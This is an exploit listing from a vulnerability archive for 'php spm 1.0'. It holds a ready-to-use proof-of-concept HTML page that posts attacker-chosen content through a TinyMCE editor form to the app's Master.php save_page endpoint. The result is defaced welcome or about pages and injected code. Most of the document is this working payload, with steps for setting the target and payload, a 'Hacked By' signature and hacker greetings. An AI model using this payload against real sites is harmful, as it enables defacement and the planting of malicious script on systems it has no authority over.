Share
## https://sploitus.com/exploit?id=PACKETSTORM:181829
=============================================================================================================================================
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================
poc :
[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php .
[+] Line 86 : Set your Target.
[+] Line 27 : set your payload. <textarea name="page[welcome] ===> You can type welcome or about.
[+] save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome Page Editor</title>
<script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
<main id="main" class="main">
<div class="pagetitle">
<h1>Welcome Page</h1>
<nav>
<ol class="breadcrumb">
<li class="breadcrumb-item active">Welcome Page</li>
</ol>
</nav>
</div>
<div id="msg-container"></div>
<div class="card rounded-0">
<div class="card-body rounded-0 pt-4">
<div class="container-fluid">
<form id="page-form">
<textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
</form>
</div>
</div>
<div class="card-footer">
<div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
<button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
</div>
</div>
</div>
<div id="loader" style="display:none;">Loading...</div>
<div id="toast"></div>
<script>
// Initialize TinyMCE
tinymce.init({
selector: 'textarea.tinymce-editor',
height: 300,
menubar: false,
plugins: [
'advlist autolink lists link image charmap print preview anchor',
'searchreplace visualblocks code fullscreen',
'insertdatetime media table paste code help wordcount'
],
toolbar: 'undo redo | formatselect | bold italic backcolor | ' +
'alignleft aligncenter alignright alignjustify | ' +
'bullist numlist outdent indent | removeformat | help'
});
// Loader functions
function start_loader() {
document.getElementById('loader').style.display = 'block';
}
function end_loader() {
document.getElementById('loader').style.display = 'none';
}
// Toast function
function showMessage(message, type) {
const messageDiv = document.getElementById('toast');
messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
setTimeout(() => {
messageDiv.innerHTML = '';
}, 3000);
}
// Form submit event listener
document.getElementById('page-form').addEventListener('submit', function(e) {
e.preventDefault(); // Prevent page reload
// Start loader
start_loader();
const formData = new FormData(this); // Get form data
const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object
// Set up request
xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);
// Handle response
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
end_loader();
if (xhr.status === 200) {
const response = JSON.parse(xhr.responseText);
if (response.status === 'success') {
showMessage('Page updated successfully!', 'success');
location.reload(); // Reload the page if successful
} else if (response.status === 'failed' && response.msg) {
showMessage(response.msg, 'error');
} else {
showMessage('An unknown error occurred.', 'error');
}
} else {
showMessage('Error: ' + xhr.statusText, 'error');
}
}
};
// Send the request
xhr.send(formData);
});
</script>
</main>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================